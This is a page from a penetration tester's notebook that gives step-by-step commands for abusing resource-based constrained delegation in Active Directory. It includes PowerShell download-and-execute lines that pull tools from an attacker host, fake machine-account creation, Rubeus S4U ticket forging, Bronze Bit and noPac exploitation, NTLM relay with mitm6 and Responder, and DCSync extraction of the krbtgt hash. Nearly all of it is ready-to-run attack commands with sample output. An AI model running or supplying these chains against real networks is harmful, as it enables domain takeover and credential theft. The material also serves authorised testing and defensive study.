Pentester's Promiscuous Notebook
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2
      • Covenant
      • Empire
      • Havoc
      • Meterpreter
      • PoshC2
      • Sliver
    • Infrastructure
      • AD
        • ACL Abuse
        • AD CS Abuse
          • dNSHostName Spoofing (Certifried)
          • ESC1
          • ESC4
          • ESC8
          • ESC15
          • Golden Certificate
          • Pass-the-Certificate
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasion
          • .NET Assembly
            • .NET Config Loader
            • .NET Dynamic API Invocation
            • .NET In-Memory Assembly
            • .NET Reflective Assembly
          • AMSI Bypass
          • Application Whitelist Bypass
          • AppLocker Bypass
          • BYOVD
          • CLM Bypass
          • Defender
          • ETW Block
          • Execution Policy Bypass
          • Mimikatz
          • UAC Bypass
        • Authentication Coercion
        • BadSuccessor
        • Credentials Harvesting
          • From Memory
            • lsass.exe
            • svchost.exe
          • Credential Phishing
          • DCSync
          • DPAPI
          • KeePass
          • Linux
          • LSA
          • NetSync
          • NPLogonNotify
          • NTDS
          • Password Filter
          • RDP
          • SAM
          • SSH Clients
          • SSPI
        • Discovery
        • DnsAdmins
        • Dominance
        • GPO Abuse
        • Kerberos
          • Delegation Abuse
            • Constrained
            • Resource-based Constrained
            • Unconstrained
          • Kerberos Relay
          • Roasting
        • Key Credentials Abuse
        • LAPS
        • Lateral Movement
          • DCOM
          • Overpass-the-Hash
          • Pass-the-Hash
          • Pass-the-Ticket
          • RDP
          • RPC
          • RunAs
          • SMB
          • SPN-jacking
          • WinRM / PSRemoting
          • WMI
        • LDAP
        • NTLM
          • NTLM Relay
          • NTLMv1 Downgrade
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abuse
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilege
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure AD
        • On-Prem ↔ Cloud
          • Cloud → On-Prem
          • On-Prem → Cloud
        • PRT Abuse
      • DevOps
        • Ansible
        • Artifactory
        • Atlassian
        • Containerization / Orchestration
        • GitLab
        • HashiCorp Vault
        • Jenkins
        • VS Code
        • Zabbix
      • DBMS
        • FireBird
        • MS SQL
        • MySQL / MariaDB
        • Oracle
        • Redis
        • SQLite
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networks
        • L2
          • ARP Spoofing
          • DHCPv6 Spoofing
          • LLMNR / NBNS Poisoning
          • SNACs Abuse
          • VLAN Hopping
        • NAC Bypass
        • Scanning
        • SIP / VoIP
        • Sniff Traffic
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINT
      • Shodan
    • Password Brute Force
      • Generate Wordlists
    • Perimeter
      • 1C
      • ADFS
      • Cisco
      • DNS
      • Exchange
      • Information Gathering
      • IPSec
      • Java RMI
      • Log4j / Log4Shell
      • Lync & Skype for Business
      • NTP
      • Outlook
      • OWA
      • SharePoint
      • SMTP
      • SSH
      • Subdomain Takeover
    • Shells
      • Reverse Shells
      • Web Shells
    • Web
      • 2FA Bypass
      • LFI / RFI
      • SOP / CORS
      • SQLi
      • WAF
      • WordPress
      • XSS
    • Wi-Fi
      • WPA / WPA2
        • Enterprise
        • Personal
  • ⚔️Red Team
    • Basics
    • Cobalt Strike
      • UDRL
    • Infrastructure
    • MalDev
      • API Hashing
      • API Hooking
      • BOF / COFF
      • CFG
      • Code Injection
        • DLL Injectors
        • Process Hollowing
        • Process Injectors
        • Shellcode Runners
      • DLL Hijacking
      • Golang
      • Kernel Mode
      • PIC / Shellcode
      • Nim
      • Sandbox Evasion
      • Syscalls
      • Windows API
    • SE
      • Phishing
        • HTML Smuggling
        • MS Office
        • Rogue RDP
  • 🐞Exploit Dev
    • BOF
      • OSCP BOF
      • OSED SEH Overflow
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linux
      • Kali
    • Networking
      • DHCP Server & Linux Hotspot
      • Quick Configurations
      • Routing
      • WireGuard
    • Virtualization
      • Docker
      • Hyper-V
      • VirtualBox
      • VMWare
    • Windows
Powered by GitBook
On this page
  • MAQ (Machine Account Quota)
  • CVE-2021-34470
  • RBCD from Windows
  • PowerView 4.0
  • RBCD from Linux
  • rbcd-attack
  • rbcd_permissions
  • impacket-rbcd
  • Bronze Bit
  • Metasploit
  • RBCD with UPNs
  • Automatization
  • RBCD for PrivEsc
  • sAMAccountName Spoofing (noPac)
  • dNSHostName Spoofing (Certifried)
  • mitm6 + WPAD + LDAPS NTLM Relay + RBCD
  • WebDav + LDAPS NTLM Relay + RBCD
  • Clean Up
  1. Pentest
  2. Infrastructure
  3. AD
  4. Kerberos
  5. Delegation Abuse

Resource-based Constrained

Last updated 11 months ago

MAQ (Machine Account Quota)

PowerShell (ActiveDirectory module):

PS > Get-ADObject -Identity "DC=megacorp,DC=local" -Properties * | select ms-ds-machineAccountQuota

PowerView:

PV3 > Get-DomainObject -Identity "DC=megacorp,DC=local" | select ms-ds-machineAccountQuota

LDAP:

$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd1!' -m custom --filter '(&(objectClass=domain)(distinguishedName=DC=megacorp,DC=local))' --attrs ms-ds-machineAccountQuota
$ ldeep ldap -d megacorp.local -u snovvcrash -p 'Passw0rd!' -s ldap://192.168.1.11 search '(&(objectClass=domain)(distinguishedName=DC=megacorp,DC=local))' ms-ds-machineAccountQuota

CrackMapExec:

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M MAQ

CVE-2021-34470

RBCD from Windows

Load tools:

PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powerview4.ps1")

Define credentials for the compromised account with the necessary DACL:

PS > $userWithDaclUsername = 'megacorp.local\snovvcrash'
PS > $userWithDaclPassword = ConvertTo-SecureString 'Qwe123!@#' -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential($userWithDaclUsername, $userWithDaclPassword)

Add new machine account and configure RBCD (i.e., set msDS-AllowedToActOnBehalfOfOtherIdentity property to value of the new machine account SID) on the vulnerable host (DC01):

Powermad > New-MachineAccount -MachineAccount fakemachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > $computerSID = Get-DomainComputer -Identity fakemachine -Properties ObjectSid -Verbose -Credential $cred | select -Expand ObjectSid
PS > $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($computerSID))"
PS > $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS > $SD.GetBinaryForm($SDBytes, 0)
PV3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $cred
PS > .\Rubeus.exe hash /domain:megacorp.local /user:fakemachine$ /password:Passw0rd!
FC525C9683E8FE067095BA2DDC971889
PS > .\Rubeus.exe s4u /domain:megacorp.local /user:fakemachine$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:DC01$ /msdsspn:CIFS/DC01.megacorp.local /altservice:host,wsman,ldap,http /ptt

If the ticket cannot be imported or there's no access to corresponding services, troubleshoot it:

  • Try impersonating different privileged users when requesting the ticket.

  • Try using FQDN to NetBIOS under /msdsspn parameter (i.e., CIFS/DC01.megacorp.local > CIFS/DC01).

After the ticket has been successfully imported we can go for filesystem access (CIFS), PSRemoting (WSMAN), DCSync (LDAP) and so on:

PS > klist
# CIFS
PS > cd \\DC01.megacorp.local\c$
PS > ls
PS > c:
# WSMAN
PS > Enter-PSSession -ComputerName DC01.megacorp.local
PS > exit
# LDAP
PS > ...DCSync...

Clean up:

PV3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $cred
Powermad > Remove-MachineAccount -MachineAccount fakemachine

PowerView 4.0

Configure RBCD on the vulnerable host (DC01):

PV4 > Set-DomainRBCD DC01 -DelegateFrom fakemachine -Verbose

Clean up:

PV4 > Set-DomainRBCD DC01 -Clear -Verbose

RBCD from Linux

Add new machine account:

$ addcomputer.py -computer-name 'fakemachine' -computer-pass 'Passw0rd!' -dc-ip 192.168.1.11 -dc-host DC02.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#'

Ask TGS for LDAP:

$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'DC01' -dc-ip 192.168.1.11 megacorp.local/fakemachine:'Passw0rd!'

rbcd-attack

Configure RBCD on the vulnerable host (DC01):

$ python3 rbcd.py -f fakemachine -t DC01 -dc-ip 192.168.1.11 megacorp.local/snovvcrash:'Passw0rd!'
$ python3 rbcd.py -f fakemachine -t DC01 -dc-ip 192.168.1.11 megacorp.local/'MEGACORP\SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889

rbcd_permissions

Configure RBCD on the vulnerable host (DC01) via PtH:

$ python3 rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H fc525c9683e8fe067095ba2ddc971889:fc525c9683e8fe067095ba2ddc971889 -l 192.168.1.11

impacket-rbcd

$ rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'SRV01$' -dc-ip 192.168.1.11 -k -no-pass -action {read,write,remove,flush} megacorp.local/snovvcrash

Bronze Bit

CVE-2020-17049

PS > Get-KerberosAESKey -Password 'Passw0rd!' -Salt MEGACORP.LOCALfakemachine
AES128 Key: 01C7B89A74F7AEC1007DED2F3DE0A815
AES256 Key: 211E8E3134ED797B0A2BF6C36D1A966B3BED2B24E4AAA9ECEED23D0ABF659E98

Or with Mimikatz:

mimikatz # kerberos::hash /domain:megacorp.local /user:fakemachine /password:Passw0rd!
        * rc4_hmac_nt       fc525c9683e8fe067095ba2ddc971889
        * aes128_hmac       01c7b89a74f7aec1007ded2f3de0a815
        * aes256_hmac       211e8e3134ed797b0a2bf6c36d1a966b3bed2b24e4aaa9eceed23d0abf659e98
        * des_cbc_md5       621a91461f1adffe

Now you can impersonate a protected user:

$ addcomputer.py -computer-name fakemachine -computer-pass 'Passw0rd!' -dc-ip 192.168.1.11 -dc-host DC01.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#'
$ python3 rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H 79bfd1ab35c67c19715aea7f06da66ee:79bfd1ab35c67c19715aea7f06da66ee -l 192.168.1.11
$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'administrator' -dc-ip 192.168.1.11 megacorp.local/fakemachine -hashes :fc525c9683e8fe067095ba2ddc971889 -aesKey 211e8e3134ed797b0a2bf6c36d1a966b3bed2b24e4aaa9eceed23d0abf659e98 -force-forwardable
$ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 192.168.1.11 -no-pass -k

Metasploit

RBCD with UPNs

User j.doe is populated within the msDS-AllowedToActOnBehalfOfOtherIdentity property of the SRV01 machine:

PS > Set-ADComputer SRV01 -PrincipalsAllowedToDelegateToAccount j.doe

Request a regular TGT for j.doe:

PS > .\Rubeus.exe asktgt /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /nowrap

Request a U2U ticket providing TGT within the /ticket and /tgs options and specifying the user to impersonate within the /targetuser option (this is an S4U2self request):

PS > .\Rubeus.exe asktgs /u2u /targetuser:<USER_TO_IMPERSONATE> /nowrap /ticket:<TGT> /tgs:<TGT>

Obtain a hex view of the current TGT session key (RC4 HMAC):

$ python3 -c 'import binascii,base64;print(binascii.hexlify(base64.b64decode("<TGT_SESSION_KEY_B64>")).decode())'

Set j.doe's NT hash to the hexlified TGT session key:

$ smbpasswd.py megacorp.local/j.doe:'Passw0rd!'@DC01.megacorp.local -newhashes :<TGT_SESSION_KEY_HEX> -altuser MEGACORP/snovvcrash -altpass 'Passw0rd123!'

Go for the S4U attack providing the initial TGT within the /ticket option and the forwardable TGS (got from the U2U request) within the /tgs option (only the S4U2proxy part is performed):

PS > .\Rubeus.exe s4u /msdsspn:host/SRV01.megacorp.local /altservice:http /ticket:<TGT> /tgs:<TGS> /createnetonly:C:\Windows\System32\cmd.exe /show

Automatization

PS > .\Rubeus.exe s4u /u2u /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /impersonateuser:administrator /msdsspn:host/SRV01.megacorp.local /altservice:http /createnetonly:C:\Windows\System32\cmd.exe /show

RBCD for PrivEsc

$ getST.py megacorp.local/'PC01$' -hashes :`pypykatz crypto nt 'Passw0rd!'` -dc-ip 192.168.1.11 -impersonate administrator -altservice CIFS/PC01.megacorp.local -self

sAMAccountName Spoofing (noPac)

CVE-2021-42278, CVE-2021-42287

Check

Look at the size of the returned TGT. If the DC is not vulnerable, the TGT will contain the PAC part and be obviously larger:

PS > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:snovvcrash /password:Passw0rd! /nopac /nowrap
$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M nopac

Exploit

# create a new machine account
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
# clear SPNs
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear servicePrincipalName -Verbose
# change fake machine's sAMAccountName
PM > Set-MachineAccountAttribute -MachineAccount FakeMachine -Value DC01 -Attribute sAMAccountName -Verbose
# request TGT
PS > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:DC01 /password:Passw0rd! /nowrap
# change fake machine's sAMAccountName once again
PM > Set-MachineAccountAttribute -MachineAccount FakeMachine -Value FakeMachine -Attribute sAMAccountName -Verbose
# request S4U2self
PS > .\Rubeus.exe s4u /domain:megacorp.local /dc:DC01.megacorp.local /altservice:LDAP/DC01.megacorp.local /impersonateuser:Administrator /self /ptt /ticket:<BASE64_TGT>
# fire DCSync
PS > .\mimikatz.exe "lsadump::dcsync /domain:megacorp.local /dc:DC01.megacorp.local /user:MEGACORP\krbtgt" "exit"

Manually with Impacket:

# create a new machine account
$ addcomputer.py -computer-name FakeMachine -computer-pass 'Passw0rd1!' -dc-host DC01.megacorp.local -dc-ip 192.168.1.11 megacorp.local/snovvcrash:'Passw0rd2!'
# clear SPNs
$ addspn.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd2!' -t 'FakeMachine$' -c DC01
# change fake machine's sAMAccountName
$ renameMachine.py megacorp.local/snovvcrash:'Passw0rd2!' -dc-ip 192.168.1.11 -current-name 'FakeMachine$' -new-name DC01
# request TGT
$ getTGT.py megacorp.local/DC01:'Passw0rd1!' -dc-ip 192.168.1.11
# change fake machine's sAMAccountName once again
$ renameMachine.py megacorp.local/snovvcrash:'Passw0rd2!' -dc-ip 192.168.1.11 -current-name DC01 -new-name 'FakeMachine$'
# request S4U2self
$ KRB5CCNAME=DC01.ccache getST.py -spn LDAP/DC01.megacorp.local -altservice LDAP/DC01.megacorp.local megacorp.local/DC01 -k -no-pass -dc-ip 192.168.1.11 -impersonate administrator -self
# fire DCSync
$ KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt'

Using noPac:

# creating a computer account
$ python3 noPac.py megacorp.local/snovvcrash:'Passw0rd123!' -dc-host DC01 -dc-ip 192.168.1.11 -target-name 'FakeMachine1$' -use-ldap -dump -just-dc-ntlm
# providing an existing (owned) computer account creds
$ python3 noPac.py megacorp.local/snovvcrash:'Passw0rd123!' -dc-host DC01 -dc-ip 192.168.1.11 --impersonate administrator -no-add -target-name 'FakeMachine2$' -old-hash :fc525c9683e8fe067095ba2ddc971889

dNSHostName Spoofing (Certifried)

CVE-2022-26923

mitm6 + WPAD + LDAPS NTLM Relay + RBCD

$ ntlmrelayx.py -t ldaps://DC01.megacorp.local --delegate-access -wh attacker-wpad --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs [-debug]
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn

WebDav + LDAPS NTLM Relay + RBCD

$ cme smb 192.168.1.0/24 -u snovvcrash -p 'Passw0rd!' -M webdav
$ ntlmrelayx.py -t ldaps://DC01.megacorp.local --delegate-access [--escalate-user 'PWNED-MACHINE$'] --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
$ sudo ./Responder.py -I eth0 -wd -P -v
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt VICTIM.megacorp.local
$ getST.py -spn cifs/VICTIM.megacorp.local MEGACORP/'PWNED-MACHINE$' -dc-ip 192.168.1.11 -hashes :fc525c9683e8fe067095ba2ddc971889 -impersonate administrator

Clean Up

PS > Get-ADComputer -Identity FakeMachine | Remove-ADComputer -Confirm:$False
PS > Get-ADComputer -Identity SRV01 -Properties * | select -Expand msds-allowedToActOnBehalfOfOtherIdentity
PS > Get-ADComputer -Identity SRV01 | Set-ADComputer -Clear msds-allowedToActOnBehalfOfOtherIdentity

Ask TGS for CIFS and also inject potentially useful service names into the ticket (sname field in TGS-REQ):

Calculate Kerberos keys for the fake machine account with :

From Linux systems can be used to operate the technique.

The steps detailed on can be followed.

⚒️
https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html
https://github.com/fortra/impacket/pull/1288
https://github.com/tmenochet/ADTamper/blob/169031ac7f515aabe7339d6d99274553eb554b5e/ADTamper.ps1#L177
other
is not protected
https://github.com/tothi/rbcd-attack
https://github.com/NinjaStyle82/rbcd_permissions
https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/
https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/
Get-KerberosAESKey
https://www.n00py.io/2023/01/exploiting-resource-based-constrained-delegation-rbcd-with-pure-metasploit/
https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html
Impacket
The Hacker Recipes
https://github.com/GhostPack/Rubeus/pull/137
https://exploit.ph/delegate-2-thyself.html
https://exploit.ph/revisiting-delegate-2-thyself.html
https://www.praetorian.com/blog/red-team-privilege-escalation-rbcd-based-privilege-escalation-part-2/
https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/
https://0xdf.gitlab.io/2021/11/08/htb-pivotapi-more.html#dcsync
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
https://exploit.ph/more-samaccountname-impersonation.html
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
https://github.com/cube0x0/noPac
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
https://github.com/Ridter/noPac
https://github.com/ly4k/Pachine
https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
https://github.com/ShutdownRepo/impacket/blob/CVE-2021-42278/examples/renameMachine.py
https://github.com/ShutdownRepo/impacket/blob/getST/examples/getST.py
https://github.com/Ridter/noPac
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
https://chryzsh.github.io/relaying-delegation/
https://www.exploit-db.com/docs/48282
https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb
https://gist.github.com/zimnyaa/dcac97f3106e96053a1acb6ca9974e55
https://pentestlab.blog/2021/10/18/resource-based-constrained-delegation/
https://github.com/med0x2e/NTLMRelay2Self
https://badoption.eu/blog/2024/04/25/netntlm.html
https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/
https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/RBCD_Abuse_Checker.ps1
Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active DirectoryShenanigans Labs
Abuse RBCD
2MB
From Zero Credential to Full Domain Compromise (Haboob Team).pdf
pdf